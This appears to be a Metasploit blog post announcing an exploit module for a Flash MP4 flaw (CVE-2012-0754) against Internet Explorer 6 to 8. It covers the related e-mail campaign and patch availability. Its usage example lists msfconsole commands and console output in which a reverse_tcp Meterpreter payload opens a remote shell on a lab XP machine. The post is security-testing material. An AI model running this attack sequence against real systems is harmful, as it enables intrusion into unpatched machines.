Over the last couple days, Metasploit's own Wei "sinn3r" Chen and community contributor Juan Vazquez put together an exploit for CVE-2012-0754, which targets a vulnerability in Adobe's Flash player: adobe_flash_mp4_cprt. This the same vulnerability exploited by the recent "Iran's Oil and Nuclear Situation.doc" e-mail attack campaign spotted by Contagio on March 5. After getting a hold of the reported malware from an anonymous contributor, sinn3r and Juan were able to determine what exactly triggers the Adobe Flash bug, and thus, were able to put together a more general-purpose exploit and incorporate it into Metasploit.

Today, we have a full Internet Explorer-based exploit, operational against IE 6, 7, and 8, covering pretty much all modern and not-so-modern Windows XP and Microsoft Vista clients. In other words, this exploit provides an excellent opportunity to test out your organization's protections against fresh threats targeting a slightly out-of-date client base.

This is all significant because this Flash vulnerability has been publicly disclosed for only about three weeks, and it's unusual to see something like this show up so quickly in a live, untargeted e-mail attack campaign.

In addition, while the original exploit was strictly a Microsoft Word document based exploit (which itself was merely a downloader for the "real" payload), the Metasploit version is a proper browser-based exploit, and its usage is about as simple as it gets (detailed below). The moral of the story is, thanks to a working version of a Metasploit exploit for this relatively fresh vulnerability, security reserachers, AV/IPS vendors, and IT administrators alike can take a look at the vulnerability and make the assessment if they and their constituency are adequately protected. Hooray for open source security research!

Usage Example

$ msfconsole
msf > use windows/browser/adobe_flash_mp4_cprt
msf exploit(adobe_flash_mp4_cprt) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_mp4_cprt) > exploit
[*] Started reverse handler on 10.0.1.3:4444
[*] Using URL: http://0.0.0.0:8080/2Q0m2Zpti8wu
[*]  Local IP: http://10.0.1.3:8080/2Q0m2Zpti8wu
[*] Server started.
[*] 10.0.1.4:1797 Client requesting: /2Q0m2Zpti8wu
[*] Using msvcrt ROP
[*] 10.0.1.4:1797 /2Q0m2Zpti8wu/Exploit.swf
[*] Sending html to 10.0.1.4:1797...
[*] 10.0.1.4:1797 Client requesting: /2Q0m2Zpti8wu/Exploit.swf
[*] 10.0.1.4:1797 Sending Exploit SWF...
[*] 10.0.1.4:1797 Client requesting: /test.mp4
[*] 10.0.1.4:1797 Sending MP4...
[*] Sending stage (752128 bytes) to 10.0.1.4
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.4:1798)
 
msf  exploit(adobe_flash_mp4_cprt) > sessions
 
Active sessions
===============
 
  Id  Type                  Information  Connection
  --  ----                  -----------  ----------
  1  meterpreter x86/win32  XP\lab @ XP  10.0.1.3:4444 -> 10.0.1.4:1798 (10.0.1.4)

Patch Availability

Information regarding patch availability from Adobe can be found in their security bulletin, APSB12-03, and of course, end users are encouraged to apply appropriate patches as soon as it's convenient to do so.

Exploit Availability

This module will be part of this week's update (which is getting finished up as I wrote), and will be available (along with 800 other exploits) from the usual Metasploit download page. Of course, it's also already in the source tree, so if you're the bleeding-edge sort that already has Metasploit, it's just an msfupdate away.